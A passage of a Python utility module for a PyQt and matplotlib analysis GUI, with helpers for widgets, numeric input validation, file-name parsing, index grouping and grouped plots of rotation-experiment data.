                cb_fcn_combo = functools.partial(combo_fcn[0], combo_fcn[1], h_table, i_row, opt_col)
            # creates the combo-box object
            h_combocell = create_combobox(h_table, font, combo_opt[opt_col], cb_fcn=cb_fcn_combo)
            # creates the combobox object and fills in the options
            h_table.setCellWidget(i_row, opt_col, h_combocell)
    if col_hdr is not None:
        h_table.setHorizontalHeaderLabels(col_hdr)
    if row_hdr is not None:
        h_table.setVerticalHeaderLabels(row_hdr)
    # sets the object dimensions (if provided)
    if dim is not None:
        h_table.setGeometry(dim)
    # sets the object name (if provided)
    if name is not None:
        h_table.setObjectName(name)
    # sets the callback function (if provided)
    if cb_fcn is not None:
        h_table.cellChanged.connect(cb_fcn)
    # caps the table height so at most 3 rows are visible
    h_table.setMaximumHeight(20 + min(3, n_row) * 22)
    h_table.resizeRowsToContents()
    # stretches every column equally across the table width
    h_hdr = h_table.horizontalHeader()
    for i_col in range(len(col_hdr)):
        h_hdr.setSectionResizeMode(i_col, QHeaderView.Stretch)
    # returns the table object
    return h_table
def create_tab(parent, dim, font, h_tabchild=None, child_name=None, name=None, cb_fcn=None):
    '''
    Creates a QTabWidget, optionally adding child tab pages.

    :param parent: parent widget
    :param dim: tab widget geometry
    :param font: font object (a default font is created when None)
    :param h_tabchild: optional list of child page widgets
    :param child_name: optional list of tab titles (paired with h_tabchild)
    :param name: optional object name
    :param cb_fcn: optional current-changed callback
    :return: the tab widget object
    '''
    # creates the tab widget, falling back on a default font
    h_tabs = QTabWidget(parent)
    h_tabs.setGeometry(dim)
    h_tabs.setFont(font if font is not None else create_font_obj())
    # adds the child pages (only when both widgets and titles were given)
    if (h_tabchild is not None) and (child_name is not None):
        for h_page, page_title in zip(h_tabchild, child_name):
            h_tabs.addTab(h_page, page_title)
    # applies the optional object name
    if name is not None:
        h_tabs.setObjectName(name)
    # connects the tab-changed callback (if given)
    if cb_fcn is not None:
        h_tabs.currentChanged.connect(cb_fcn)
    return h_tabs
def create_menubar(parent, dim, name=None):
    '''
    Creates a QMenuBar.

    :param parent: parent widget
    :param dim: menubar geometry
    :param name: optional object name
    :return: the menubar object
    '''
    # creates the menubar and sets its geometry
    h_mbar = QMenuBar(parent)
    h_mbar.setGeometry(dim)
    # applies the optional object name
    if name is not None:
        h_mbar.setObjectName(name)
    return h_mbar
def create_menu(parent, title, name=None):
    '''
    Creates a QMenu with the given title.

    :param parent: parent widget
    :param title: menu title text
    :param name: optional object name
    :return: the menu object
    '''
    # creates the menu and sets its title
    h_menu = QMenu(parent)
    h_menu.setTitle(title)
    # applies the optional object name
    if name is not None:
        h_menu.setObjectName(name)
    return h_menu
def create_menuitem(parent, text, name=None, cb_fcn=None, s_cut=None):
    '''
    Creates a QAction menu item.

    :param parent: parent widget
    :param text: menu item text
    :param name: optional object name
    :param cb_fcn: optional triggered callback
    :param s_cut: optional keyboard shortcut
    :return: the menu item object
    '''
    # creates the action and sets its text
    h_act = QAction(parent)
    h_act.setText(text)
    # applies the optional object name
    if name is not None:
        h_act.setObjectName(name)
    # connects the triggered callback (if given)
    if cb_fcn is not None:
        h_act.triggered.connect(cb_fcn)
    # applies the optional keyboard shortcut
    if s_cut is not None:
        h_act.setShortcut(s_cut)
    return h_act
def delete_widget_children(h_grp):
    '''
    Schedules deletion of every widget child of a container widget.

    :param h_grp: container widget whose children are removed
    '''
    # deleteLater() defers destruction until control returns to the event loop
    for h_child in h_grp.findChildren(QWidget):
        h_child.deleteLater()
#######################################
#### MISCELLANEOUS FUNCTIONS ####
#######################################
def set_file_name(f_name, f_type):
    '''
    Ensures a file name carries the extension from a file-type filter string.

    The extension is taken from the parenthesised part of the filter (e.g.
    'CSV (.csv)' -> '.csv'), with its first character stripped, and is only
    appended when it is not already part of the name.

    :param f_name: file name being checked
    :param f_type: file-type filter string containing '(<extension>)'
    :return: file name with the extension appended (if it was missing)
    '''
    # raw string avoids the invalid '\(' escape warning in the regex literal
    f_type_ex = re.search(r'\(([^)]+)', f_type).group(1)
    if f_type_ex[1:] not in f_name:
        return '{0}.{1}'.format(f_name, f_type_ex[1:])
    else:
        return f_name
def check_edit_num(nw_str, is_int=False, min_val=-1e100, max_val=1e10, show_err=True):
    '''
    Validates a numeric editbox string against a type/range requirement.

    Fixes over the previous revision: a whole-valued float string ("5.0")
    parsed as an integer now returns a None error string (previously e_str
    was set to the sentinel 1, making valid input look like an error), a
    non-integer float with is_int=True is now rejected instead of being
    returned alongside an error string, and the bare excepts are narrowed.

    :param nw_str: string being validated
    :param is_int: True if the value must be an integer
    :param min_val: minimum permissible value
    :param max_val: maximum permissible value
    :param show_err: True to display an error dialog on failure
    :return: (value, error-string) tuple - value is None on failure, and the
             error string is None on success
    '''
    # initialisations
    nw_val, e_str = None, None
    if is_int:
        # case is the string must be an integer
        try:
            nw_val = int(nw_str)
        except (TypeError, ValueError):
            try:
                # if there was an error, determine if the string was a float
                nw_val = float(nw_str)
                if nw_val % 1 == 0:
                    # whole-valued float, so accept it as an integer
                    # (e_str stays None so callers treat this as success)
                    nw_val = int(nw_val)
                else:
                    # otherwise, the value has a fractional part
                    e_str = 'Entered value is not an integer.'
            except (TypeError, ValueError):
                # case is the string was not a valid number
                e_str = 'Entered value is not a valid number.'
    else:
        # case is the string must be a float
        try:
            nw_val = float(nw_str)
        except (TypeError, ValueError):
            # case is the string is not a valid number
            e_str = 'Entered value is not a valid number.'
    # determines if the (successfully parsed) value meets the min/max limits
    if (nw_val is not None) and (e_str is None):
        if nw_val < min_val:
            e_str = 'Entered value must be greater than or equal to {0}'.format(min_val)
        elif nw_val > max_val:
            e_str = 'Entered value must be less than or equal to {0}'.format(max_val)
        else:
            # value is valid and within bounds
            return nw_val, e_str
    # shows the error message (if required)
    if show_err:
        show_error(e_str, 'Error!')
    # returns a None value with the error string
    return None, e_str
def expand_dash_number(num_str):
    '''
    Expands a dashed number range string into a list of number strings.

    :param num_str: plain number ('5') or dashed range ('2-5')
    :return: list of number strings ('NaN' for multi-dash input)
    '''
    # plain numbers are returned as a single-entry list
    if '-' not in num_str:
        return [num_str]
    # more than one dash is not a valid range
    if num_str.count('-') > 1:
        return 'NaN'
    # expands the inclusive lo-hi range
    lo_str, hi_str = num_str.split('-')
    return [str(v) for v in range(int(lo_str), int(hi_str) + 1)]
def calc_text_width(font, text, w_ofs=0):
    '''
    Calculates the rendered pixel width of text for a given font.

    :param font: QFont used for measurement
    :param text: a string, or a list of strings (widest entry wins)
    :param w_ofs: extra width offset added to the result
    :return: text pixel width plus the offset
    '''
    # font metrics object for width measurement
    fm = QFontMetrics(font)
    if isinstance(text, list):
        # list input: the widest entry determines the width
        return max(fm.width(t) for t in text) + w_ofs
    # single string input
    return fm.width(text) + w_ofs
def det_subplot_dim(n_plot):
    '''
    Determines the row/column grid dimensions for n_plot subplots.

    :param n_plot: number of subplots to fit
    :return: (row count, column count) tuple
    '''
    # rows come from the quadratic bound, columns from the square root
    n_row = m.ceil(0.5 * (1 + m.sqrt(1 + 4 * n_plot))) - 1
    n_col = m.ceil(m.sqrt(n_plot))
    return n_row, n_col
def setup_index_arr(ind, n_ele):
    '''
    Creates the per-group index arrays for groups given by start indices.

    :param ind: sequence of group start indices
    :param n_ele: total element count (end of the final group)
    :return: object array holding one index array per group
    '''
    # each group runs from its start index to the next group's start index
    # (the final group runs to n_ele)
    ends = list(ind[1:]) + [n_ele]
    ind_grp = np.zeros(len(ind), dtype=object)
    for i, (i0, i1) in enumerate(zip(ind, ends)):
        ind_grp[i] = np.array(range(i0, i1))
    # returns the index array
    return ind_grp
def show_error(text, title):
    '''
    Displays a modal, always-on-top error message dialog.

    :param text: error message text
    :param title: dialog window title
    '''
    # builds the message dialog
    h_dlg = QMessageBox()
    h_dlg.setWindowTitle(title)
    h_dlg.setText(text)
    h_dlg.setWindowFlags(Qt.WindowStaysOnTopHint)
    # blocks until the user dismisses the dialog
    h_dlg.exec()
def get_index_groups(b_arr):
    '''
    Splits a boolean array into its contiguous True-run index groups.

    :param b_arr: boolean array
    :return: list of index arrays, one per contiguous True run
    '''
    # no True values means there are no groups at all
    if not any(b_arr):
        return []
    # labels the contiguous runs (labels are 1-based)
    lbl = measure.label(b_arr)
    return [np.where(lbl == i)[0] for i in range(1, max(lbl) + 1)]
def expand_index_groups(i_grp, n_exp, n_max):
    '''
    Expands each contiguous index group by n_exp indices on both sides.

    :param i_grp: list of contiguous index arrays (modified in place)
    :param n_exp: expansion count applied to each side
    :param n_max: exclusive upper bound for the expanded indices
    :return: the expanded index group list
    '''
    for i, grp in enumerate(i_grp):
        # clamps the expanded range to [0, n_max)
        lo = max(0, grp[0] - n_exp)
        hi = min(n_max, grp[-1] + (n_exp + 1))
        i_grp[i] = np.arange(lo, hi)
    return i_grp
def det_largest_index_group(b_arr):
    '''
    Returns the largest contiguous True-run index group of a boolean array.

    :param b_arr: boolean array
    :return: index array of the largest contiguous True run
    '''
    # splits the array into its contiguous True runs
    i_grp = get_index_groups(b_arr)
    # the group with the greatest element count wins
    grp_sz = [len(x) for x in i_grp]
    return i_grp[np.argmax(grp_sz)]
def set_binary_groups(sz, ind):
    '''
    Creates a boolean array that is True at the given indices.

    :param sz: array size/shape
    :param ind: a single index (or index array), or a list of them
    :return: the boolean array
    '''
    # normalises a scalar/array index argument into a list
    ind_l = ind if isinstance(ind, list) else [ind]
    # flags each requested index (or index block) as True
    b_arr = np.zeros(sz, dtype=bool)
    for i_set in ind_l:
        b_arr[i_set] = True
    # returns the final binary array
    return b_arr
def extract_file_name(f_file):
    '''
    Extracts the base file name (no directory, no extension) from a path.

    :param f_file: file path string
    :return: base name with the extension removed (input unchanged when the
             path contains no '.')
    '''
    # paths without any '.' are returned unchanged
    if '.' not in f_file:
        return f_file
    # strips the directory, then everything from the last '.' onwards
    base = os.path.basename(f_file)
    return base[:base.rfind('.')]
def extract_file_extn(f_file):
    '''
    Extracts the file extension (including the dot) from a file path.

    :param f_file: file path string
    :return: extension string starting at the last '.' ('' when the path
             contains no '.')
    '''
    # paths without any '.' have no extension
    if '.' not in f_file:
        return ''
    # strips the directory, then keeps everything from the last '.' onwards
    base = os.path.basename(f_file)
    return base[base.rfind('.'):]
def get_expt_index(exp_name, cluster, ind_arr=None):
    '''
    Determines the index of the experiment matching a given name.

    :param exp_name: experiment name (case-insensitive substring match)
    :param cluster: list of cluster dicts carrying an 'expFile' field
    :param ind_arr: optional boolean inclusion array; when given, the index
                    returned is relative to the included experiments only
    :return: experiment index
    '''
    # finds the first cluster whose file name contains the experiment name
    i_expt = next(i for i, c in enumerate(cluster)
                  if exp_name.lower() in extract_file_name(c['expFile']).lower())
    if ind_arr is None:
        return i_expt
    # maps to the index within the included experiments only
    return np.where(np.where(ind_arr)[0] == i_expt)[0][0]
def get_para_dict(fcn_para, f_type):
    '''
    Returns the parameter names whose group type matches f_type.

    :param fcn_para: dict of parameter-info dicts (each with a 'gtype' key)
    :param f_type: group type being matched
    :return: list of matching parameter names
    '''
    return [p_name for p_name, p_info in fcn_para.items() if p_info['gtype'] == f_type]
def set_group_enabled_props(h_groupbox, is_enabled=True):
    '''
    Recursively enables/disables every widget inside a groupbox.

    :param h_groupbox: groupbox whose children are updated
    :param is_enabled: enabled state being applied
    '''
    for h_child in h_groupbox.findChildren(QWidget):
        h_child.setEnabled(is_enabled)
        # recurses into any nested groupboxes
        if isinstance(h_child, QGroupBox):
            set_group_enabled_props(h_child, is_enabled)
def init_general_filter_data():
    '''
    Initialises an empty general filter field dict.

    :return: dict mapping each general filter field to an empty list
    '''
    # every general filter field starts out with no selections
    field_names = ['region_name', 'record_layer', 'free_ctype', 'lesion', 'record_state']
    return {f: [] for f in field_names}
def init_rotation_filter_data(is_ud, is_empty=False):
    '''
    Initialises the rotation filter field dict.

    :param is_ud: True for uniform-drifting experiments (sets the trial type)
    :param is_empty: True to create every field as an empty (unselected) list
    :return: filter field dict (includes 'is_ud' and the 't_key' lookup)
    '''
    # value -> display string lookups for the discrete-valued fields
    # (None entries have no display translation)
    t_key = {
        't_type': None,
        'sig_type': None,
        'match_type': None,
        'region_name': None,
        'record_layer': None,
        'record_coord': None,
        'lesion': None,
        'record_state': None,
        't_freq': {'0.5': '0.5 Hz', '2.0': '2 Hz', '4.0': '4 Hz'},
        't_freq_dir': {'-1': 'CW', '1': 'CCW'},
        't_cycle': {'15': '15 Hz', '120': '120 Hz'},
        'free_ctype': None,
    }
    if is_empty:
        # every field starts out unselected
        f_names = ['t_type', 'sig_type', 'match_type', 'region_name', 'record_layer',
                   'record_coord', 'lesion', 'record_state', 't_freq', 't_freq_dir',
                   't_cycle', 'free_ctype']
        f_data = {f: [] for f in f_names}
    else:
        # every field starts out fully selected; the trial type default
        # depends on whether the experiment is uniform drifting
        f_data = {'t_type': ['UniformDrifting'] if is_ud else ['Black']}
        f_names = ['sig_type', 'match_type', 'region_name', 'record_layer',
                   'record_coord', 'lesion', 'record_state', 'record_data',
                   't_freq', 't_freq_dir', 't_cycle', 'free_ctype']
        f_data.update({f: ['All'] for f in f_names})
    # appends the common fields
    f_data['is_ud'] = [is_ud]
    f_data['t_key'] = t_key
    # returns the field data
    return f_data
def get_plot_col(n_plot=1, i_ofs=0):
    '''
    Retrieves the plot colours for n_plot plot groups.

    :param n_plot: number of colours to return
    :param i_ofs: colour index offset
    :return: list of colours ('CN' cycle strings for the first 10 indices,
             then entries from the custom colour table)
    '''
    def _colour(i_col):
        # the first 10 colours use the matplotlib 'CN' colour cycle;
        # higher indices come from the custom colour table
        if i_col < 10:
            return 'C{0}'.format(i_col)
        return convert_rgb_col(custom_col[i_col - 10])[0]
    return [_colour(i_ofs + i) for i in range(n_plot)]
def det_valid_rotation_expt(data, is_ud=False, t_type=None, min_count=2):
    '''
    Flags which loaded experiments have valid rotational analysis data.

    :param data: data object holding the loaded experiment clusters
    :param is_ud: True to additionally require UniformDrifting trials
    :param t_type: optional trial type list; at least min_count of these must
                   be present in the experiment
    :param min_count: minimum matching trial type count (used with t_type)
    :return: list of boolean validity flags (one per experiment)
    '''
    is_valid = []
    for c in data._cluster:
        # experiments without rotation info are always invalid
        if c['rotInfo'] is None:
            is_valid.append(False)
        elif is_ud:
            # uniform drifting requires that trial type to be present
            is_valid.append('UniformDrifting' in c['rotInfo']['trial_type'])
        elif t_type is not None:
            # requires at least min_count of the given trial types
            n_match = sum(tt in c['rotInfo']['trial_type'] for tt in t_type)
            is_valid.append(n_match >= min_count)
        else:
            is_valid.append(True)
    # returns the array
    return is_valid
def det_valid_vis_expt(data, is_vis_only=False):
    '''
    Determines whether any valid uniform/motor drifting experiments are loaded.

    :param data: data object holding the loaded experiment clusters
    :param is_vis_only: True to return only the combined flag
    :return: combined flag, or (combined, has-uniform, has-motor) tuple
    '''
    # checks for uniform-drifting and motor-drifting experiments
    has_ud_expt = any(det_valid_rotation_expt(data, True))
    has_md_expt = any(det_valid_rotation_expt(data, t_type=['MotorDrifting'], min_count=1))
    has_any = has_ud_expt or has_md_expt
    # returns either the combined flag alone or the full flag set
    return has_any if is_vis_only else (has_any, has_ud_expt, has_md_expt)
def set_axis_limits(ax, x_lim, y_lim):
    '''
    Sets the x- and y-axis limits of a plot axis.

    :param ax: plot axis object
    :param x_lim: x-axis limits
    :param y_lim: y-axis limits
    '''
    # applies each limit through its matching setter
    for set_lim, lim in ((ax.set_xlim, x_lim), (ax.set_ylim, y_lim)):
        set_lim(lim)
def set_equal_axis_limits(ax, ind):
    '''
    Applies identical square x/y limits over a group of plot axes.

    :param ax: list/array of plot axis objects
    :param ind: indices of the axes being equalised
    '''
    # collects the x/y limit values over all selected axes
    x_all = [lim for i in ind for lim in ax[i].get_xlim()]
    y_all = [lim for i in ind for lim in ax[i].get_ylim()]
    # the common square limit covers the extremes of both axes
    lim_sq = [min(min(x_all), min(y_all)), max(max(x_all), max(y_all))]
    # applies the square limits to each selected axis
    for i in ind:
        set_axis_limits(ax[i], lim_sq, lim_sq)
def reset_plot_axes_limits(ax, ax_lim, ax_str, is_high):
    '''
    Resets one end of a single axis' limits.

    :param ax: plot axis object
    :param ax_lim: new limit value
    :param ax_str: axis being reset ('x', 'y', anything else = z)
    :param is_high: 0/False to reset the lower end, 1/True for the upper end
    '''
    # retrieves the getter/setter pair for the chosen axis
    if ax_str == 'x':
        get_lim, set_lim = ax.get_xlim, ax.set_xlim
    elif ax_str == 'y':
        get_lim, set_lim = ax.get_ylim, ax.set_ylim
    else:
        get_lim, set_lim = ax.get_zlim, ax.set_zlim
    # overwrites the requested end of the current limits
    lim_new = list(get_lim())
    lim_new[is_high] = ax_lim
    set_lim(lim_new)
def combine_nd_arrays(A, B, dim=1, dim_append=0):
    '''
    Appends two object ndarrays, padding the smaller one so the sizes match.

    :param A: original array (a None value returns B unchanged)
    :param B: array being appended
    :param dim: dimension padded (with empty object entries) to match sizes
    :param dim_append: dimension along which the arrays are joined
    :return: the combined array
    '''
    # a missing original array means B is the entire result
    if A is None:
        return B

    def _pad(X, n_add):
        # pads X along dim with an empty object block of size n_add
        sz = [n if i != dim else n_add for i, n in enumerate(np.shape(X))]
        return np.append(X, np.empty(sz, dtype=object), axis=dim)

    # pads whichever array is smaller along the matching dimension
    nA, nB = np.shape(A)[dim], np.shape(B)[dim]
    if nA > nB:
        B = _pad(B, nA - nB)
    elif nA < nB:
        A = _pad(A, nB - nA)
    # joins the (now size-matched) arrays
    return np.append(A, B, axis=dim_append)
def create_general_group_plot(ax, y_plt, grp_plot_type, col):
    '''
    Creates a grouped comparison plot of the values in y_plt on the given axes.

    :param ax: the axes object where the plot is created
    :param y_plt: list of 2D value arrays (one per group; columns are the types
                  within each group)
    :param grp_plot_type: the plot type string, i.e., one of 'Stacked Bar',
                          'Violin/Swarmplot', 'Violinplot', 'Separated Bar' or 'Boxplot'
    :param col: list of the plot colours (one per type)
    :return: for 'Stacked Bar', the stacked bar handles; otherwise a list of dummy
             off-axes bar handles used for the legend (empty if only one type)
    '''

    # creates the plot based on type
    if grp_plot_type == 'Stacked Bar':
        # case is a stacked bar plot
        return create_stacked_bar(ax, y_plt, col)
    else:
        # initialisations
        n_grp, n_type = len(y_plt), np.shape(y_plt[0])[1]
        xi_type = np.arange(n_type)

        if grp_plot_type in ['Violin/Swarmplot', 'Violinplot']:
            # case is a violin (and optional overlaid swarm/strip) plot

            # initialisations
            vl_col = {}
            x1, x2, y = [], [], []

            # sets the pallete colours for each type (keyed by type index)
            for i_type in range(n_type):
                vl_col[i_type] = col[i_type]

            for i_grp in range(n_grp):
                # sets the violin/swarmplot dictionaries
                # (x1 = group index per value, x2 = type index per value, y = flattened values)
                x1.append([i_grp] * np.prod(y_plt[i_grp].shape))
                x2.append(flat_list([[i] * len(y) for i, y in enumerate(y_plt[i_grp].T)]))
                y.append(y_plt[i_grp].T.flatten())

                # plots the vertical dashed separation line between adjacent groups
                if i_grp > 0:
                    ax.plot([i_grp - 0.5] * 2, [-1e6, 1e6], 'k--')

            # sets up the plot dictionary (flattens the per-group lists)
            _x1, _x2, y = flat_list(x1), flat_list(x2), flat_list(y)
            if grp_plot_type == 'Violin/Swarmplot':
                # sets up the violin/swarmplot dictionary
                vl_dict = setup_sns_plot_dict(ax=ax, x=_x1, y=y, inner=None, hue=_x2, palette=vl_col)
                st_dict = setup_sns_plot_dict(ax=ax, x=_x1, y=y, edgecolor='gray', hue=_x2,
                                              split=True, linewidth=1, palette=vl_col)

                # creates the violin/swarmplot
                h_vl = sns.violinplot(**vl_dict)
                h_st = sns.stripplot(**st_dict)

                # removes the hue legend (redundant if there is only one type)
                if n_type == 1:
                    h_vl._remove_legend(h_vl.get_legend())
                    h_st._remove_legend(h_st.get_legend())
            else:
                # sets up the violinplot dictionary (hue only makes sense for >1 type)
                vl_dict = setup_sns_plot_dict(ax=ax, x=_x1, y=y, palette=vl_col)
                if n_type > 1:
                    vl_dict['hue'] = _x2

                # creates the violinplot
                h_vl = sns.violinplot(**vl_dict)

                # removes the hue legend (redundant if there is only one type)
                if n_type == 1:
                    h_vl._remove_legend(h_vl.get_legend())

            # sets the x-axis tick marks (one tick per group)
            ax.set_xlim(ax.get_xlim())
            ax.set_xticks(np.arange(n_grp))
        else:
            # case is a separated bar graph or boxplot

            # initialisations
            xi_tick = np.zeros(n_grp)

            for i_grp in range(n_grp):
                # sets the x-values for the current group
                # (groups are spaced n_type + 1 apart, leaving one empty slot between them)
                xi = xi_type + i_grp * (n_type + 1)
                n_ex, xi_tick[i_grp] = np.shape(y_plt[i_grp])[0], np.mean(xi)

                # plots the vertical dashed separation line between adjacent groups
                if i_grp > 0:
                    ax.plot([xi[0] - 1] * 2, [-1e6, 1e6], 'k--')

                # creates the graph based on the type
                if grp_plot_type == 'Separated Bar':
                    # case is a separated bar graph

                    # sets the mean/sem plot values (n_ex here is sqrt of the
                    # per-column non-NaN counts, used for the SEM denominator)
                    n_ex = np.sum(~np.isnan(y_plt[i_grp]), axis=0) ** 0.5
                    y_plt_mn = np.nanmean(y_plt[i_grp], axis=0)
                    y_plt_sem = np.nanstd(y_plt[i_grp], axis=0) / n_ex

                    # creates the bar graph (with the SEM error bars)
                    ax.bar(xi, y_plt_mn, yerr=y_plt_sem, color=col[:n_type])

                elif grp_plot_type == 'Boxplot':
                    # case is a boxplot

                    # creates the boxplot (NaN values are removed beforehand)
                    if np.ndim(y_plt[i_grp]) == 1:
                        ii = ~np.isnan(y_plt[i_grp])
                        h_bbox = ax.boxplot(y_plt[i_grp][ii], positions=xi, vert=True, patch_artist=True, widths=0.9)
                    else:
                        y_plt_g = [y[~np.isnan(y)] for y in y_plt[i_grp].T]
                        h_bbox = ax.boxplot(y_plt_g, positions=xi, vert=True, patch_artist=True, widths=0.9)

                    # resets the colour of the boxplot patches (one colour per type)
                    for i_patch, patch in enumerate(h_bbox['boxes']):
                        patch.set_facecolor(col[i_patch])

                    # resets the median lines to black
                    for h_md in h_bbox['medians']:
                        h_md.set_color('k')

            # sets the x-axis tick marks (one tick at each group centre)
            ax.set_xlim([-1, xi[-1] + 1])
            ax.set_xticks(xi_tick)

        # creates the dummy off-axes bar objects (used for the plot legend)
        h_plt = []
        if n_type > 1:
            for i_type in range(n_type):
                h_plt.append(ax.bar(-10, 1, color=col[i_type]))

        # returns the plot objects
        return h_plt
def create_stacked_bar(ax, Y, c):
    '''
    Creates a stacked bar graph on the given axes.

    :param ax: the axes object where the bar graph is created
    :param Y: 2D array of the bar values (stack type x bar index)
    :param c: list of the facecolours (one per stack type)
    :return: list of the bar graph handles (one per stack type)
    '''

    # initialisations
    h_bar, xi_ind = [], np.array(range(np.size(Y, axis=1)))
    bar_bottom = np.zeros(np.size(Y, axis=1))

    # creates/appends to the stacked bar graph
    for i_type in range(np.size(Y, axis=0)):
        if i_type == 0:
            # case is the first bar plot stack
            h_bar.append(ax.bar(xi_ind, Y[i_type, :], color=c[i_type]))
        else:
            # case is the other bar-plot stacks
            h_bar.append(ax.bar(xi_ind, Y[i_type, :], bottom=bar_bottom, color=c[i_type]))

        # accumulates the stack heights WITHOUT mutating the caller's array
        # (the original in-place "bar_bottom += Y[i_type, :]" wrote through a
        #  view of Y's first row, corrupting the input array)
        bar_bottom = bar_bottom + Y[i_type, :]

    # sets the x-axis tick marks
    ax.set_xticks(xi_ind)

    # returns the bar graph handles
    return h_bar
def create_plot_table(ax, data, row_hdr, col_hdr, loc='bottom', bbox=None, rowColours=None,
                      colColours=None, f_sz=None, colWidths=None, cellColours=None):
    '''
    Creates a matplotlib table on the given axes object.

    :param ax: the axes object where the table is created
    :param data: 2D array of the table cell values
    :param row_hdr: list of the row header strings (or None)
    :param col_hdr: list of the column header strings (or None)
    :return: the created table object
    '''

    # creates the table object (row/cell text is centre-aligned)
    h_table = ax.table(cellText=data, rowLabels=row_hdr, colLabels=col_hdr, loc=loc, rowLoc='center',
                       cellLoc='center', bbox=bbox, rowColours=rowColours, colColours=colColours,
                       cellColours=cellColours, colWidths=colWidths)

    # manually overrides the table font size (if one was provided)
    if f_sz is not None:
        h_table.auto_set_font_size(False)
        h_table.set_fontsize(f_sz)

    # returns the table object
    return h_table
def add_rowcol_sum(A):
    '''
    Appends a row-sum column and a column-sum row to a 2D array.

    :param A: the 2D numerical array
    :return: copy of A with the summed column/row appended (the bottom-right
             element is the grand total)
    '''

    # appends the row-sum column, then the column-sum row
    row_sums = np.sum(A, axis=1).reshape(-1, 1)
    A_csum = np.hstack((A, row_sums))
    return np.vstack((A_csum, np.sum(A_csum, axis=0)))
def create_bubble_boxplot(ax, Y, wid=0.75, plot_median=True, s=60, X0=None, col=None):
    '''
    Creates a jittered "bubble" scatter plot for each group in Y, with optional
    median lines.

    :param ax: the axes object where the plot is created
    :param Y: list of value arrays (one per plot group)
    :param wid: the horizontal jitter width of each group
    :param plot_median: if True, a median line is drawn for each group
    :param s: the scatter marker size
    :param X0: optional x-locations for each group (group index + 1 if not given)
    :param col: optional marker edge colours (one per group)
    :return:
    '''

    # sets the default plot colours (if not provided)
    n_plot = len(Y)
    if col is None:
        col = get_plot_col(len(Y))

    for i_plot, y_grp in enumerate(Y):
        # creates the zero-mean horizontal jitter offsets for the group
        dX = wid * (0.5 - np.random.rand(len(y_grp)))
        dX -= np.mean(dX)

        # creates the bubble plot (markers are hollow circles)
        if X0 is None:
            ax.scatter((i_plot + 1) + dX, y_grp, s=s, facecolors='none', edgecolors=col[i_plot])
        else:
            ax.scatter(X0[i_plot] + dX, y_grp, s=s, facecolors='none', edgecolors=col[i_plot], zorder=10)

        # plots the median line (if required)
        if plot_median:
            x_md = (i_plot + 1) + (wid / 2) * np.array([-1, 1])
            ax.plot(x_md, np.median(y_grp) * np.ones(2), linewidth=2)

    # sets the x-axis limits/ticks (only when default group locations are used)
    if X0 is None:
        ax.set_xlim(0.5, n_plot + 0.5)
        ax.set_xticks(np.array(range(n_plot)) + 1)
def create_connected_line_plot(ax, Y, s=60, col=None, X0=None, plot_mean=True):
    '''
    Creates a paired scatter plot (2 groups) with dashed lines connecting each
    matched point pair, optionally overlaying the connected group means.

    :param ax: the axes object where the plot is created
    :param Y: 2-element list of the paired value arrays
    :param s: the scatter marker size
    :param col: optional marker edge colours (one per group)
    :param X0: optional x-locations of the 2 groups (1 and 2 if not given)
    :param plot_mean: if True, the group means are plotted/connected
    :return:
    '''

    # initialisations
    n_plot, n_cell = len(Y), len(Y[0])
    y_mn0, y_mn1 = np.mean(Y[0]), np.mean(Y[1])

    # sets the default plot colours (if not provided)
    if col is None:
        col = get_plot_col(len(Y))

    # sets the x-locations of each point pair
    if X0 is None:
        X = np.ones((n_cell, 2))
        X[:, 1] *= 2
    else:
        X = repmat(X0, n_cell, 1)

    # plots the dashed connecting line for each point pair
    for y_a, y_b, x_pair in zip(Y[0], Y[1], X):
        ax.plot(x_pair, [y_a, y_b], 'k--')

    # creates the hollow scatter markers for both groups
    ax.scatter(X[:, 0], Y[0], s=s, facecolors='none', edgecolors=col[0], zorder=10)
    ax.scatter(X[:, 1], Y[1], s=s, facecolors='none', edgecolors=col[1], zorder=10)

    # creates the mean scatter plot points (connected by a thick black line)
    if plot_mean:
        ax.plot([1, 2], [y_mn0, y_mn1], 'k', linewidth=4)
        ax.scatter(1, y_mn0, s=2 * s, edgecolors=col[0], zorder=11)
        ax.scatter(2, y_mn1, s=2 * s, edgecolors=col[1], zorder=11)

    # sets the x-axis limits/ticks
    if X0 is None:
        ax.set_xlim(0.5, n_plot + 0.5)
        ax.set_xticks(np.array(range(n_plot)) + 1)
def det_reqd_cond_types(data, t_type):
    '''
    Determines, for each valid rotation experiment, which of the required trial
    condition types that experiment contains.

    :param data: the overall data container
    :param t_type: list of the required trial condition type strings
    :return: list (one entry per valid experiment) of the matching trial types
    '''

    # flags the experiments that contain at least one of the required trial types
    is_rot_expt = det_valid_rotation_expt(data, t_type=t_type, min_count=1)

    # for each valid experiment, returns the trial types present within it
    return [[tt for tt in t_type if tt in c_expt['rotInfo']['trial_type']]
            for c_expt, is_ok in zip(data._cluster, is_rot_expt) if is_ok]
def get_r_stats_values(r_stats_obj, f_key, is_arr=False):
    '''
    Retrieves a named field from an R statistics result object (rpy2 list vector).

    :param r_stats_obj: the R statistical results object
    :param f_key: the name of the field being retrieved
    :param is_arr: if True, the full field value is returned (not just the first element)
    :return: the full field value, or its first scalar element
    '''

    try:
        # standard case - the names attribute supports list-style index lookup
        r_stats_val = r_stats_obj[r_stats_obj.names.index(f_key)]
    except (AttributeError, ValueError, TypeError):
        # fallback - locate the field via an element-wise name comparison
        # (was a bare except; narrowed so unrelated errors are not silently masked)
        r_stats_val = list(r_stats_obj)[np.where(r_stats_obj.names == f_key)[0][0]]

    if is_arr:
        # case is the full field array is required
        return r_stats_val
    elif isinstance(r_stats_val[0], np.ndarray):
        # case is the field holds a nested array (return the first scalar)
        return r_stats_val[0][0]
    else:
        # case is the field holds a flat sequence (return the first element)
        return r_stats_val[0]
def lcm(x, y):
    """This function takes two positive
    integers and returns the L.C.M.

    Uses the identity lcm(x, y) = |x * y| / gcd(x, y) instead of the original
    linear upward search, which was O(lcm(x, y)) and could be extremely slow
    for coprime inputs.
    """

    from math import gcd

    # note: for zero input the original raised ZeroDivisionError; this returns
    # the mathematically conventional lcm(0, n) = 0 instead
    return abs(x * y) // gcd(x, y)
def combine_stacks(x, y):
    '''
    Depth-stacks two 2D arrays, padding the narrower array with empty (object)
    columns so both column counts match.

    :param x: the first 2D array
    :param y: the second 2D array
    :return: the 3D depth-stacked array
    '''

    def _pad_cols(arr, n_add):
        # appends n_add uninitialised object columns to the 2D array
        blank = np.empty((np.size(arr, axis=0), n_add), dtype=object)
        return np.concatenate((arr, blank), axis=1)

    # pads whichever array has the lesser column count
    d_col = np.size(x, axis=1) - np.size(y, axis=1)
    if d_col > 0:
